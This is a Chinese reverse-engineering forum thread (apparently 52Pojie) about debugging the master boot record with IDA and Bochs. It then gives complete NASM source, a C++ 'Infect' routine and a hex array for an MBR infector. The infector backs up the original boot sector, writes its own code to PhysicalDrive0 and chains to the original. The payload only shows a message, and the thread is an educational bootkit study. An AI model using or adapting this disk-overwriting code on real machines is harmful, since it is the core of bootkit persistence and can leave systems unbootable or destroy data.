willJ 发表于 2012-11-24 18:38

IDA&&BOCHS调试MBR

本帖最后由 willJ 于 2012-11-24 18:41 编辑

一、说明IDA都很熟悉,强大的逆向工具。Bochs是一个x86硬件平台的开源模拟器。它可以模拟各种硬件的配置。Bochs模拟的是整个PC平台,包括I/O设备、内存和BIOS。更为有趣的是,甚至可以不使用PC硬件来运行Bochs。对于调试操作系统是灰常强大的。说白了就是一个虚拟机。

二、IDA调试MBRIDA调试MBR比较简单,先配置下虚拟机的VMX文件,添加一下代码:debugStub.listen.guest32 = "TRUE"
debugStub.hideBreakpoints = "TRUE"
bios.bootDelay = "3000"打开IDA--Debugger--Attach--Remote GDB debuggerHostname为localhost,port为8832启动虚拟机后点击上面窗口OK按钮,弹出选择附加进程,选择第一个,点OK在MBR载入内存的地方下断,也就是断在0x7c00F9运行起来,停在下面这个时候最好Alt+s下,选择16位的模式,因为这个时候还未进入32位模式这个时候就可以随意的调试了,或许要比静态看清晰点吧。

三、Bochs调试MBRBochs是强大开源调试操作系统的模拟器,可以去http://bochs.sourceforge.net下载源码和软件。首先新建一个硬盘(我安装的是2.6版本),开始--Bochs 2.6--Disk Image Creation Tool,一路默认回车就可以在当前目录创建一个虚拟硬盘,我这里是c.img新建文件夹winxp,创建配置文件,我这里命名为WinXP.bxrc,将c.img复制进来# how much memory the emulated machine will have
megs: 256
# hard disk
ata0-master: type=disk, path="c.img", mode=flat, cylinders=20, heads=16, spt=63
ata0-slave: type=cdrom, path="H:\WinXP.ISO", status=inserted
# choose the boot disk.
boot: disk创建一个debugmbr.bat的批处理文件,用于启动调试模式..\bochsdbg.exe -q -f WinXP.bxrc直接将XP的MBR复制进c.img的前512字节。启动debugmbr.bat后停在下图,下断于0x7c00(b 0x7c00),使用c命令继续运行到断点调用u /10显示10行反汇编调用r显示寄存器状态如果想要单步走就使用s命令(相当于OD的F7),可以使用n单步(相当于OD的F8)
--------------------------------我是分割线---------------------------------------------------------

四、自己写代码修改MBR这里主要的工作是将原始MBR备份到第二扇区,第一扇区写入自己的代码,执行完自己的代码后再调用原始MBR,自己的代码就实现一个显示I Love 52Pojie吧。代码如下,每句详细注释。;File: MBR.ASM
;Author: willJ
;Date: 2012.11.24
;Compile: nasm -f bin MBR.ASM -o MBR.COM
;////////////////////////////////////////////////////////////////////////////////
jmp START
DATA:
    db "I Love 52Pojie!",0xa,0xd   ;需要显示的数据
START:
    xor bx, bx                                                    ;清零bx寄存器
    mov ds, bx                                                ;将ds清零
    mov ax,                                           ;0x413记录了BIOS的内存可用区域
                                                                     ;从高到低分配的
    sub ax, 2                                                    ;ax-2就是分配2KB空间
    mov , ax                                          ;更新0x413的值
    shl ax, 0x6                                                ;这里是计算出分配的段起始地址
                                                                      ;左移6位就是乘2的6次方
                                                                      ;以为16位汇编寻址为段寄存器*16+寄存器的方式
                                                                      ;所以这里得ax*1024/16所以为左移2的6次方
    mov es, ax                                                   ;得到的段寄存器复制给es      
    mov si, 0x7c00                                              ;赋值si为0x7c00,也就是代码起始位置   
    xor di, di                                                       ;清零di      
    mov cx, 0x200                                             ;大小为0x200也就是512字节      
    rep movsb                                                   ;将自己分配过去达到内存驻留的效果
    push es                                                         ;将es压栈
    push Main
    retf                                                                ;相当于jmp指令,跳向Main的地方      
Main:
    call ShowMessage                                             ;显示信息
    call GetInput                                                      ;获取用户输入,如果是回车就启动系统
    call BootOriginOs                                             ;启动原始系统
ShowMessage                                                       ;利用int 10h中断显示信息
    mov bp, DATA                                                   ;需要显示的内容
    mov cx, 0xF                                                      ;显示的内容大小
    mov ah, 0x13                                                    ;中断功能号
    mov al, 0x01                                                   ;al显示的方式
    mov bh, 0x00                                                    ;bh为0显示页就是当前页面
    mov bl, 0x0c                                                   ;bl为0xc表示字体属性,这里显示为红色
    xor dx, dx                                                         ;dh,dl为表示行坐标,列坐标,这里为0
    int 10h                                                             ;调用10H中断
    ret
GetInput:                                                            ;接受用户输入
    mov ah, 0x00                                                    ;ah表示0号子功能
    int 16h                                                             ;调用16H中断,从键盘读字符
    and ax, 0xff                                                      ;ah/al=扫描码/ASCII
    cmp al, 0xd                                                      ;比较输入是不是为回车,回车ASCII为0xd      
    jnz GetInput                                                   ;不相等就循环,相等就返回
    ret
BootOriginOs:                                                       ;启动操作系统
    xor dx, dx                                                         ;清零dx
    mov es, dx                                                      ;赋值es为0
    mov ah, 0x02                                                    ;调用Int 13H中断的2号子功能
    mov al, 0x01                                                   ;al为1表示读取1个扇区
    mov ch, 0x00                                                    ;ch为0表示0号柱面
    mov cl, 0x02                                                   ;cl为2表示读取第二个扇区,也就是备份的原MBR
    mov dx, 0x80                                                    ;80表示读取为硬盘
    mov bx, 0x7c00                                                 ;es:bx为内存缓冲区地址,就是要载入到那个内存去
    int 13h                                                             ;调用13H中断
    jmp 0x0:0x7c00                                                ;跳向内存0x7c00继续执行
times 510-($-$$)db 0                                           ;$表示当前地址,$$表示起始地址,
                                                                            ;这个代码表示将510字节剩余的空间0填充
dw0xAA55                                                         ;最后两个字节为55AA,也就是MBR结束标志

五、编译利用nasm编译程序,然后利用Winhex导出2进制,这里可以直接手工调用将MBR复制到第二扇区,然后将我们的代码复制进第一扇区,我这里写一个程序实现。

六、代码实现MBR感染核心感染代码VOID Infect()
{
    HANDLEhandle;
    BYTE   *pStr;
    DWORD   Length;
    handle = ::CreateFile("\\\\.\\PHYSICALDRIVE0",
GENERIC_WRITE   | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
    if (INVALID_HANDLE_VALUE == handle)
    {
      MessageBox(NULL, "Open DISK error!", "Wrong", MB_OK);
      return;
    }
    pStr = (BYTE*)VirtualAlloc(NULL, MBR_SIZE, MEM_COMMIT, PAGE_READWRITE | PAGE_NOCACHE);
    if (NULL == pStr)
    {
      MessageBox(NULL, "VirtualAlloc() Error!", "Wrong", MB_OK);
      return;
    }
    SetFilePointer(handle, 0, NULL, FILE_BEGIN);
    if (!ReadFile(handle, pStr, MBR_SIZE, &Length, NULL))
    {
      MessageBox(NULL, "ReadFile() Error!", "Wrong", MB_OK);
      return;
    }
    //将原来的MBR写入第二个扇区里面
    SetFilePointer(handle, MBR_SIZE, NULL, FILE_BEGIN);
    if (!WriteFile(handle, pStr, MBR_SIZE, &Length, NULL))
    {
      MessageBox(NULL, "WriteFile() Error!", "Wrong", MB_OK);
      return;
    }
    //修复MBR当中的分区表
    memcpy(&MBR, pStr+0x1be, 4 * 16);
    SetFilePointer(handle, 0, NULL, FILE_BEGIN);
    if (!WriteFile(handle, MBR, MBR_SIZE, &Length, NULL))
    {
      MessageBox(NULL, "WriteFile() MBR Error!", "Wrong", MB_OK);
      return;
    }
    VirtualFree(pStr, MBR_SIZE, MEM_RELEASE);
    CloseHandle(handle);
MessageBox(NULL, "感染成功", "Right", MB_OK);
    return;
}
void CMBR_InfectDlg::OnButton1()
{
// TODO: Add your control notification handler code here
Infect();
}.h文件#include <Windows.h>
#define MBR_SIZE 512
unsigned char MBR = {
0xE9, 0x11, 0x00, 0x49, 0x20, 0x4C, 0x6F, 0x76, 0x65, 0x20, 0x35, 0x32, 0x50, 0x6F, 0x6A, 0x69,
0x65, 0x21, 0x0A, 0x0D, 0x31, 0xDB, 0x8E, 0xDB, 0xA1, 0x13, 0x04, 0x2D, 0x02, 0x00, 0xA3, 0x13,
0x04, 0xC1, 0xE0, 0x06, 0x8E, 0xC0, 0xBE, 0x00, 0x7C, 0x31, 0xFF, 0xB9, 0x00, 0x02, 0xF3, 0xA4,
0x06, 0x68, 0x35, 0x00, 0xCB, 0xE8, 0x06, 0x00, 0xE8, 0x16, 0x00, 0xE8, 0x1F, 0x00, 0xBD, 0x03,
0x00, 0xB9, 0x0F, 0x00, 0xB4, 0x13, 0xB0, 0x01, 0xB7, 0x00, 0xB3, 0x0C, 0x31, 0xD2, 0xCD, 0x10,
0xC3, 0xB4, 0x00, 0xCD, 0x16, 0x25, 0xFF, 0x00, 0x3C, 0x0D, 0x75, 0xF5, 0xC3, 0x31, 0xD2, 0x8E,
0xC2, 0xB4, 0x02, 0xB0, 0x01, 0xB5, 0x00, 0xB1, 0x02, 0xBA, 0x80, 0x00, 0xBB, 0x00, 0x7C, 0xCD,
0x13, 0xEA, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
};

七、感染后的效果图回车后可以进入系统。每次看见wowocock大牛的的文章都只能仰望,希望可以努力向您靠近,继续努力吧。

willJ 发表于 2014-5-16 09:10

whitehole 发表于 2014-5-15 16:36
我使用ida调试的时候不能下断啊?附加之后,7c00的地方什么都没有

用32位的IDA试试

whitehole 发表于 2014-5-15 16:36

我使用ida调试的时候不能下断啊?附加之后,7c00的地方什么都没有

1354669803 发表于 2012-11-24 18:44

膜拜J牛 病毒克星

淡然出尘 发表于 2012-11-24 18:45

这个东西纯属支持、表示能力达不到、O(∩_∩)O~

19nuclear91 发表于 2012-11-24 19:11

JJ果然屌爆了

a070458 发表于 2012-11-25 12:51

J牛太强悍了

3765999 发表于 2012-11-25 13:17

狠强大·!!!

莺歌燕语 发表于 2012-11-25 13:18

本帖最后由 莺歌燕语 于 2012-11-25 13:20 编辑

楼主不得了啊,连代码都能给分析出来

KMSRussian 发表于 2012-12-6 15:35

本帖最后由 KMSRussian 于 2012-12-6 15:43 编辑

1IDA搭配VMWare输出的GDB信息 调试VMWare 中的WIN7 /WIN7 X64单步会跑飞IDA 插件的bug   XP没问题

2基本bochs纯调试mbr或者自己篡改下mbr而引导不了windows没有什么意义 .....用来调试bk的引导代码挺好的 比方说TDL4刚开始调比较不适应.....

3VMWare 不会完全模拟执行MBR中的代码的 在VMWare里面调试引导扇始终是不保险的....      http://advdbg.org/blogs/advdbg_system/articles/416.aspx

如果非要调试VMWare中的bk比方说TDL4 我推荐GDB的 GUI版本Insight

KMSRussian 发表于 2012-12-6 15:39

By KMSRussian

/*----------------------One Bochs---------------------*/
1 bochs缺点:时间很长安装操作系统 8小时
2 bochs+IDA bochs pluginspython


/*----------------------Two GDB-----------------------*/
1 GDB Console+VMWare
2 GDB GUI    +VMWare 推荐OK
3 GDB+IDA plugins+VMWare(我测试的时候xp好使 win7/win7 X64没法单步 一单步就跑飞了)
4 GDB+IDA plugins+VMWare+python脚本调试windows 内核带符号表

/*----------------------Three------------------------*/
M钩的无限逼近大法



推荐个网页   sysnap 发我的 可以看一下http://www.nobunkum.ru/analytics/en-mbr-infectors

willJ 发表于 2012-12-6 19:35

KMSRussian 发表于 2012-12-6 15:35 static/image/common/back.gif
1IDA搭配VMWare输出的GDB信息 调试VMWare 中的WIN7 /WIN7 X64单步会跑飞IDA 插件的bug   XP没问题

...

谢谢大牛的经验之谈
页: [1] 2 3
查看完整版本: IDA&&BOCHS调试MBR